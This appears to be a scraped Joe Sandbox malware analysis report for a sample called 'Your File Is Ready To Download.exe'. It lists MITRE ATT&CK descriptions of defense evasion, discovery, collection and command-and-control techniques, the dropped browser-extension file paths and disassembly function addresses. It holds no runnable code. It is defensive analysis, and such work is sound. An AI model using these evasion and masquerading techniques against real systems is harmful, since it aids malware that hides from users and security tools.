Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Your File Is Ready To Download.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\ServiceApp\apps-helper\chrome.crx

C:\Users\user\AppData\Local\ServiceApp\apps-helper\manifest.json

C:\Users\user\AppData\Local\ServiceApp\apps-helper\service.js

C:\Users\user\AppData\Local\ServiceApp\apps-helper\web.js

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
Your File Is Ready To Download.exe

Function 00911050 Relevance: 64.9, APIs: 18, Strings: 19, Instructions: 161
libraryloaderCOMMON

Function 00911480 Relevance: 42.3, APIs: 14, Strings: 10, Instructions: 289
COMMON

Function 00911330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114
processsynchronizationCOMMON

Function 009114F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
fileCOMMON

Function 00911270 Relevance: 4.6, APIs: 3, Instructions: 79
registryCOMMON

Function 009115AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
fileCOMMON

Function 00911200 Relevance: 3.0, APIs: 2, Instructions: 46
registryCOMMON

Function 009136F1 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 009148AA Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 0091390D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00912039 Relevance: 1.3, APIs: 1, Instructions: 14
sleepCOMMON